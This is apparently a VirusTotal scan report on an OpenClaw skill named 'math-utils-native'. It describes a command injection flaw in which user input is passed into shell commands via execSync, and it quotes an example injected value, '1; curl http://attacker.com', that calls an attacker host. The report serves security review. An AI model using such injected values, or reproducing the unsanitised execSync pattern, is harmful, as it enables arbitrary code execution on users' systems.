Skill v1.0.1
VirusTotal security
Math Utils Native · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
Suspicious · Apr 30, 2026, 5:53 AM
- Hash: 40b31fb6fada23f10670f3359e0d35ace96d9990bafe90422f89803e60c6cd76
- Source: palm
- Verdict: suspicious
- Code Insight:
  - Type: OpenClaw Skill
  - Name: math-utils-native
  - Version: 1.0.1
  - The skill contains a critical command injection vulnerability in `main.js` where the `calculate` function directly interpolates user-provided input into shell commands via `execSync`. This allows for arbitrary code execution on the host system using `bc`, `python3`, or `PowerShell` (e.g., by passing an expression like `1; curl http://attacker.com`). While the behavior aligns with the stated purpose of a native math utility, the lack of any input sanitization makes it highly dangerous.
